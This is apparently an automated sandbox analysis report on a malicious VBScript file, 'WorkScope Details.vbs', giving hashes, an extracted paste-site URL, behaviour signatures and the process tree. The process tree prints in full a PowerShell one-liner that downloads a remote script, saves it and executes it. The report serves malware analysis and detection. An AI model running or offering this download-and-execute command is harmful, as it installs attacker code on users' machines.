Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
15-04-2022 12:16
Static task
static1
Behavioral task
behavioral1
Sample
WorkScope Details.vbs
Resource
win7-20220414-en
General
-
Target
WorkScope Details.vbs
-
Size
31KB
-
MD5
0284695a0af70e045cf579e015ebbdf4
-
SHA1
f0c20148cf96f0c81463e0224d80d4c67d7c1a04
-
SHA256
78a742710aa79e0574a6faefecfaf851b64043889e75768f5de091cfc5a21dc0
-
SHA512
6e54499711e1a0ee1ecd4679d7584027a424ba496d0bca868cc8e8d13d47097c4f0d65c0e4277c1457371b37e0c525a8ade33860cabd4e8869a438282af89e56
Malware Config
Extracted
https://textbin.net/raw/mevlbkxshp
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 1492 powershell.exe 5 1492 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1492 powershell.exe 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1648 wrote to memory of 1492 1648 WScript.exe 27 PID 1648 wrote to memory of 1492 1648 WScript.exe 27 PID 1648 wrote to memory of 1492 1648 WScript.exe 27 PID 1492 wrote to memory of 1500 1492 powershell.exe 29 PID 1492 wrote to memory of 1500 1492 powershell.exe 29 PID 1492 wrote to memory of 1500 1492 powershell.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50558c637d1ab3bb3a8a6becee7a23c12
SHA10924ebf98bad2dc88b32bcba48cf8d87cb991751
SHA256ab4cdb449e05ab0c0d21e59239a95228b1e4ec2f76a0181c102725780b347b05
SHA512955287fa6a150847464c38c59816dc830ae3878cc95c2be222ffac43cf61b282e16ad52142bb31cb55101543bec2c56451717b6e80e52738cc58b9bf69dfee8d
-
Filesize
3B
MD5ecaa88f7fa0bf610a5a26cf545dcd3aa
SHA157218c316b6921e2cd61027a2387edc31a2d9471
SHA256f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
SHA51237c783b80b1d458b89e712c2dfe2777050eff0aefc9f6d8beedee77807d9aeb2e27d14815cf4f0229b1d36c186bb5f2b5ef55e632b108cc41e9fb964c39b42a5